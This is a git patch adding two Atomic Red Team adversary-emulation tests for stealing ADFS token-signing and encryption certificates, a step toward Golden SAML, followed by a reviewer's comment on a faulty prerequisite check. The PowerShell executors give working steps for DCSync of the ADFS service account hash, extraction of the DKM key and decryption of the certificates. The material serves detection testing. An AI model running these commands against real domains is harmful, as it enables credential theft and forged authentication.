From 0fd43a3d6314e7f3a78f0695950f97a25a8f24bd Mon Sep 17 00:00:00 2001
From: piaconsigny
Date: Thu, 19 Aug 2021 11:20:48 +0200
Subject: [PATCH] add adfs certificates theft
---
atomics/T1552.004/T1552.004.yaml | 96 ++++++++++++++++++++++++++++++++
1 file changed, 96 insertions(+)
diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml
index 431e5b0c..a1129a9b 100644
--- a/atomics/T1552.004/T1552.004.yaml
+++ b/atomics/T1552.004/T1552.004.yaml
@@ -103,3 +103,99 @@ atomic_tests:
 cleanup_command: |
 rm -rf #{output_folder}
 name: sh
+- name: ADFS token signing and encryption certificates theft - Local
+ auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f
+ description: |
+ Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server.
+ Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ AADInternals module must be installed.
+ prereq_command: |
+ if (Get-Module AADInternals) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Install-Module -Name AADInternals -Force
+ executor:
+ command: |
+ Import-Module AADInternals -Force
+ Export-AADIntADFSCertificates
+ Get-ChildItem | Where-Object {$_ -like "ADFS*"}
+ Write-Host "`nCertificates retrieved successfully"
+ cleanup_command: |
+ Remove-Item -Path ".\ADFS_encryption.pfx"
+ Remove-Item -Path ".\ADFS_signing.pfx"
+ name: powershell
+- name: ADFS token signing and encryption certificates theft - Remote
+ auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442
+ description: |
+ Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.
+ Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+ supported_platforms:
+ - windows
+ input_arguments:
+ adfs_service_account_name:
+ description: Name of the ADFS service account
+ type: String
+ default: "adfs_svc"
+ replication_user:
+ description: Username with replication rights. It can be the Domain Admin running the script
+ type: String
+ default: "Administrator"
+ replication_password:
+ description: Password of replication_username
+ type: String
+ default: "ReallyStrongPassword"
+ adfs_server_name:
+ description: Name of an ADFS server
+ type: String
+ default: "sts.contoso.com"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ AADInternals and ActiveDirectory modules must be installed.
+ prereq_command: |
+ if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1}
+ get_prereq_command: |
+ Install-Module -Name AADInternals -Force
+ executor:
+ command: |
+ Import-Module ActiveDirectory -Force
+ Import-Module AADInternals -Force | Out-Null
+ #Get Configuration
+ $dcServerName = (Get-ADDomainController).HostName
+ $svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq "#{adfs_service_account_name}"
+ $PWord = ConvertTo-SecureString -String "#{replication_password}" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord
+ # use DCSync to fetch the ADFS service account's NT hash
+ $hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex
+ $ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}
+ # Get certificates decryption key
+ $Configuration = [xml]$ADFSConfig
+ $group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group
+ $container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName
+ $parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn
+ $base = "LDAP://CN=$group,$container,$parent"
+ $ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))
+ $ADSearch.Filter = '(name=CryptoPolicy)'
+ $ADSearch.PropertiesToLoad.Clear()
+ $ADSearch.PropertiesToLoad.Add("displayName") | Out-Null
+ $aduser = $ADSearch.FindOne()
+ $keyObjectGuid = $ADUser.Properties["displayName"]
+ $ADSearch.PropertiesToLoad.Clear()
+ $ADSearch.PropertiesToLoad.Add("thumbnailphoto") | Out-Null
+ $ADSearch.Filter="(l=$keyObjectGuid)"
+ $aduser=$ADSearch.FindOne()
+ $key=[byte[]]$aduser.Properties["thumbnailphoto"][0]
+ # Get encrypted certificates from configuration and decrypt them
+ Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key
+ Get-ChildItem | Where-Object {$_ -like "ADFS*"}
+ Write-Host "`nCertificates retrieved successfully"
+ cleanup_command: |
+ Remove-Item -Path ".\ADFS_encryption.pfx"
+ Remove-Item -Path ".\ADFS_signing.pfx"
+ name: powershell
+
+
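Review bot: The Remote test's `prereq_command` can never report a missing prerequisite: it uses `echo 0`/`echo 1` rather than `exit 0`/`exit 1` as the Local test does, so the PowerShell process always exits 0, and it joins the two module checks with `-or` although the dependency description states that both AADInternals and ActiveDirectory are required. The AADInternals check also omits `-ListAvailable`, so it passes only when the module is already loaded in the session, unlike the ActiveDirectory check next to it. I would change the line to `if ((Get-Module -ListAvailable -Name AADInternals) -and (Get-Module -ListAvailable -Name ActiveDirectory)) {exit 0} else {exit 1}`; since `get_prereq_command` installs only AADInternals, a missing ActiveDirectory module would then be surfaced to the operator instead of silently passing. For consistency with the other substitutions in the executor, the credential construction should quote the username: `-ArgumentList "#{replication_user}", $PWord`.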